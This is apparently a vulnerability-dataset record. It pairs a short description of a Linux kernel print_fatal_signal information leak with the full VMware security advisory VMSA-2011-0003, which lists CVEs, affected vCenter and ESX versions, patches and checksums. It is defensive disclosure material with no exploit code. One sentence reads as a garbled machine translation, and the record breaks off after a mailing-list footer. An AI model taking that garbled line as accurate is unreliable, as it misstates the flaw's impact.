    "data": "The print_fatal_signal function in kernel/signal.c in the Linux kernel before 2.6.32.4 on the i386 platform, when print-fatal-signals is enabled, allows local users to discover the contents of arbitrary memory locations by jumping to an address and then reading a log file, and might allow local users to cause a denial of service (system slowdown or crash) by jumping to an address. (DoS) There is a possibility of being put into a state. The Linux kernel is prone to a local information-disclosure vulnerability. \nLocal attackers can exploit this issue to obtain sensitive information that may lead to further attacks. Denial-of-service attacks are also possible. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2011-0003\nSynopsis:          Third party component updates for VMware vCenter\n                   Server, vCenter Update Manager, ESXi and ESX\nIssue date:        2011-02-10\nUpdated on:        2011-02-10 (initial release of advisory)\nCVE numbers:       --- Apache Tomcat ---\n                   CVE-2009-2693 CVE-2009-2901 CVE-2009-2902\n                   CVE-2009-3548 CVE-2010-2227 CVE-2010-1157\n                   --- Apache Tomcat Manager ---\n                   CVE-2010-2928\n                   --- cURL ---\n                   CVE-2010-0734\n                   --- COS Kernel ---\n                   CVE-2010-1084 CVE-2010-2066 CVE-2010-2070\n                   CVE-2010-2226 CVE-2010-2248 CVE-2010-2521\n                   CVE-2010-2524 CVE-2010-0008 CVE-2010-0415\n                   CVE-2010-0437 CVE-2009-4308 CVE-2010-0003\n                   CVE-2010-0007 CVE-2010-0307 CVE-2010-1086\n                   CVE-2010-0410 CVE-2010-0730 CVE-2010-1085\n                   CVE-2010-0291 CVE-2010-0622 CVE-2010-1087\n                   CVE-2010-1173 CVE-2010-1437 CVE-2010-1088\n                   CVE-2010-1187 CVE-2010-1436 CVE-2010-1641\n                   CVE-2010-3081\n                   --- Microsoft SQL Express ---\n                   CVE-2008-5416 CVE-2008-0085 CVE-2008-0086\n                   CVE-2008-0107 CVE-2008-0106\n                   --- OpenSSL ---\n                   CVE-2010-0740 CVE-2010-0433\n                   CVE-2010-3864 CVE-2010-2939\n                   --- Oracle (Sun) JRE ---\n                   CVE-2009-3555 CVE-2010-0082 CVE-2010-0084\n                   CVE-2010-0085 CVE-2010-0087 CVE-2010-0088\n                   CVE-2010-0089 CVE-2010-0090 CVE-2010-0091\n                   CVE-2010-0092 CVE-2010-0093 CVE-2010-0094\n                   CVE-2010-0095 CVE-2010-0837 CVE-2010-0838\n                   CVE-2010-0839 CVE-2010-0840 CVE-2010-0841\n                   CVE-2010-0842 CVE-2010-0843 CVE-2010-0844\n                   CVE-2010-0845 CVE-2010-0846 CVE-2010-0847\n                   CVE-2010-0848 CVE-2010-0849 CVE-2010-0850\n                   CVE-2010-0886 CVE-2010-3556 CVE-2010-3566\n                   CVE-2010-3567 CVE-2010-3550 CVE-2010-3561\n                   CVE-2010-3573 CVE-2010-3565 CVE-2010-3568\n                   CVE-2010-3569 CVE-2010-1321 CVE-2010-3548\n                   CVE-2010-3551 CVE-2010-3562 CVE-2010-3571\n                   CVE-2010-3554 CVE-2010-3559 CVE-2010-3572\n                   CVE-2010-3553 CVE-2010-3549 CVE-2010-3557\n                   CVE-2010-3541 CVE-2010-3574\n                   --- pam_krb5 ---\n                   CVE-2008-3825 CVE-2009-1384\n- ------------------------------------------------------------------------\n\n1. Summary\n\n   Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere\n   Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues. \n\n\n2. Relevant releases\n\n   vCenter Server 4.1 without Update 1,\n\n   vCenter Update Manager 4.1 without Update 1,\n\n   ESXi 4.1 without patch ESXi410-201101201-SG,\n\n   ESX 4.1 without patch ESX410-201101201-SG. \n\n\n3. Problem Description\n\n a. vCenter Server and vCenter Update Manager update Microsoft\n    SQL Server 2005 Express Edition to Service Pack 3\n\n    Microsoft SQL Server 2005 Express Edition (SQL Express)\n    distributed with vCenter Server 4.1 Update 1 and vCenter Update\n    Manager 4.1 Update 1 is upgraded from  SQL Express Service Pack 2\n    to SQL Express Service Pack 3, to address multiple security\n    issues that exist in the earlier releases of Microsoft SQL Express. \n\n    Customers using other database solutions need not update for\n    these issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,\n    CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL\n    Express Service Pack 3. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    Update Manager 4.1       Windows  Update 1\n    Update Manager 4.0       Windows  affected, patch pending\n    Update Manager 1.0       Windows  affected, no patch planned\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            any       ESX      not affected\n\n  * Hosted products are VMware Workstation, Player, ACE, Fusion. \n\n b. vCenter Apache Tomcat Management Application Credential Disclosure\n\n    The Apache Tomcat Manager application configuration file contains\n    logon credentials that can be read by unprivileged local users. \n\n    The issue is resolved by removing the Manager application in\n    vCenter 4.1 Update 1. \n\n    If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon\n    credentials are not present in the configuration file after the\n    update. \n\n    VMware would like to thank Claudio Criscione of Secure Networking\n    for reporting this issue to us. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-2928 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  not affected\n    VirtualCenter  2.5       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            any       ESX      not affected\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n c. vCenter Server and ESX, Oracle (Sun) JRE is updated to version\n    1.6.0_21\n\n    Oracle (Sun) JRE update to version 1.6.0_21, which addresses\n    multiple security issues that existed in earlier releases of\n    Oracle (Sun) JRE. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Oracle (Sun) JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082,\n    CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088,\n    CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092,\n    CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837,\n    CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841,\n    CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845,\n    CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849,\n    CVE-2010-0850. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following name to the security issue fixed in\n    Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  not applicable **\n    VirtualCenter  2.5       Windows  not applicable **\n\n    Update Manager 4.1       Windows  not applicable **\n    Update Manager 4.0       Windows  not applicable **\n    Update Manager 1.0       Windows  not applicable **\n\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      not applicable **\n    ESX            3.5       ESX      not applicable **\n    ESX            3.0.3     ESX      not applicable **\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Oracle (Sun) JRE 1.5.0 family\n\nd. vCenter Update Manager Oracle (Sun) JRE is updated to version\n   1.5.0_26\n\n    Oracle (Sun) JRE update to version 1.5.0_26, which addresses\n    multiple security issues that existed in earlier releases of\n    Oracle (Sun) JRE. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566,\n    CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573,\n    CVE-2010-3565,CVE-2010-3568, CVE-2010-3569,  CVE-2009-3555,\n    CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562,\n    CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572,\n    CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541,\n    CVE-2010-3574. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  not applicable **\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    Update Manager 4.1       Windows  Update 1\n    Update Manager 4.0       Windows  affected, patch pending\n    Update Manager 1.0       Windows  affected, no patch planned\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      not applicable **\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      affected, no patch planned\n    ESX            3.0.3     ESX      affected, no patch planned\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Oracle (Sun) JRE 1.6.0 family\n\n e. vCenter Server and ESX Apache Tomcat updated to version 6.0.28\n\n    Apache Tomcat updated to version 6.0.28, which addresses multiple\n    security issues that existed in earlier releases of Apache Tomcat\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i\n    and CVE-2009-3548. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the following names to the security issues fixed in\n    Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  not applicable **\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not applicable **\n    ESX            3.0.3     ESX      not applicable **\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n ** this product uses the Apache Tomcat 5.5 family\n\n f. vCenter Server third party component OpenSSL updated to version\n    0.9.8n\n\n    The version of the OpenSSL library in vCenter Server is updated to\n    0.9.8n. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-0740 and CVE-2010-0433 to the\n    issues addressed in this version of OpenSSL. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        4.1       Windows  Update 1\n    vCenter        4.0       Windows  affected, patch pending\n    VirtualCenter  2.5       Windows  affected, no patch planned\n\n    hosted *       any       any      not applicable\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            any       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE,  Fusion. \n\n g. ESX third party component OpenSSL updated to version 0.9.8p\n\n    The version of the ESX OpenSSL library is updated to 0.9.8p. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-3864 and CVE-2010-2939 to the\n    issues addressed in this update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not applicable\n\n    hosted *       any       any      not applicable\n    ESXi           4.1       ESXi     ESXi410-201101201-SG\n    ESXi           4.0       ESXi     affected, patch pending\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n h. ESXi third party component cURL updated\n\n    The version of cURL library in ESXi is updated. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2010-0734 to the issues addressed in\n    this update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           4.1       ESXi     ESXi410-201101201-SG\n    ESXi           4.0       ESXi     affected, patch pending\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            any       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n i. ESX third party component pam_krb5 updated\n\n    The version of pam_krb5 library is updated. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2008-3825 and CVE-2009-1384 to the\n    issues addressed in the update. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n j. ESX third party update for Service Console kernel\n\n    The Service Console kernel is updated to include kernel version\n    2.6.18-194.11.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070,\n    CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524,\n    CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308,\n    CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086,\n    CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291,\n    CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437,\n    CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and\n    CVE-2010-3081 to the issues addressed in the update. \n\n    Note: This update also addresses the 64-bit compatibility mode\n    stack pointer underflow issue identified by CVE-2010-3081. This\n    issue was patched in an ESX 4.1 patch prior to the release of\n    ESX 4.1 Update 1. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201101201-SG\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the checksum of your downloaded file. \n\n   VMware vCenter Server 4.1 Update 1 and modules\n   ----------------------------------------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n   http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html\n\n   File type: .iso\n   md5sum: 729cf247aa5d33ceec431c86377eee1a\n   sha1sum: c1e10a5fcbc1ae9d13348d43541d574c563d66f0\n\n   File type: .zip\n   md5sum: fd1441bef48a153f2807f6823790e2f0\n   sha1sum: 31737a816ed1c08ab3a505fb6db2483f49ad7c19\n\n   VMware vSphere Client\n   File type: .exe\n   md5sum: cb6aa91ada1289575355d79e8c2a9f8e\n   sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESXi 4.1 Installable Update 1\n   -----------------------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html\n   http://kb.vmware.com/kb/1027919\n\n   File type: .iso\n   MD5SUM: d68d6c2e040a87cd04cd18c04c22c998\n   SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1)\n   File type: .zip\n   MD5SUM: 2f1e009c046b20042fae3b7ca42a840f\n   SHA1SUM: 1c9c644012dec657a705ddd3d033cbfb87a1fab1\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0)\n   File type: .zip\n   MD5SUM: 67b924618d196dafaf268a7691bd1a0f\n   SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516 \t\n\n   ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5)\n   File type: .zip\n   MD5SUM: a6024b9f6c6b7b2c629696afc6d07cf4\n   SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488 \t\n\n   VMware Tools CD image for Linux Guest OSes\n   File type: .iso\n   MD5SUM: dad66fa8ece1dd121c302f45444daa70\n   SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af \t\n\n   VMware vSphere Client\n   File type: .exe\n   MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e\n   SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESXi Installable Update 1 contains the following security bulletins:\n   ESXi410-201101201-SG. \n\n   ESX 4.1 Update 1\n   ----------------\n\nhttp://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0\n   Release Notes:\n\nhttp://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html\n   http://kb.vmware.com/kb/1029353\n\n   ESX 4.1 Update 1 (DVD ISO)\n   File type: .iso\n   md5sum: b9a275b419a20c7bedf31c0bf64f504e\n   sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11 \t\n\n   ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1)\n   File type: .zip\n   md5sum: 2d81a87e994aa2b329036f11d90b4c14\n   sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798 \t\n\n   Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1\n   File type: .zip\n   md5sum: 75f8cebfd55d8a81deb57c27def963c2\n   sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2 \t\n\n   ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0)\n   File type: .zip\n   md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2\n   sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922 \t\n\n   VMware Tools CD image for Linux Guest OSes\n   File type: .iso\n   md5sum: dad66fa8ece1dd121c302f45444daa70\n   sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af \t\n\n   VMware vSphere Client\n   File type: .exe\n   md5sum: cb6aa91ada1289575355d79e8c2a9f8e\n   sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4\n\n   ESX410-Update01 contains the following security bulletins:\n   ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL,\n   Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904\n   ESX410-201101226-SG (glibc)      | http://kb.vmware.com/kb/1031330\n\n   ESX410-Update01 also contains the following non-security bulletins\n   ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG,\n   ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG,\n   ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG,\n   ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG,\n   ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG,\n   ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG. \n\n   To install an individual bulletin use esxupdate with the -b option. \n\n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2928\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0087\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0089\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0090\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0841\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0843\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0844\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0846\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0849\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0850\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1157\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0433\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3864\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0734\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3825\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1084\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2066\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2070\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2226\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2248\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2521\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2524\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0415\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0437\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4308\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0003\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0007\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0307\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1086\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0410\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0730\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1085\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0291\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0622\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1087\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1088\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1187\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1436\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1641\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3556\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3566\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3567\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3550\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3561\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3565\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3568\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3569\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1321\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3548\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3551\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3562\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3571\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3554\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3559\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3572\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3553\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3549\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3557\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3541\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3574\n\n- ------------------------------------------------------------------------\n6. Change log\n\n2011-02-10  VMSA-2011-0003\nInitial security advisory in conjunction with the release of vCenter\nServer 4.1 Update 1, vCenter Update Manager 4.1 Update 1, ESXi 4.1\nUpdate 1, and ESX 4.1 Update 1 on 2011-02-10. \n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisories\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2011 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAk1U1eoACgkQS2KysvBH1xm3swCfeh4sWvPOubDT1K7QlRj3SjW9\ndxYAmwbNLMR9IG/rKZDYh9hqcf4IldCX\n=2pVj\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - 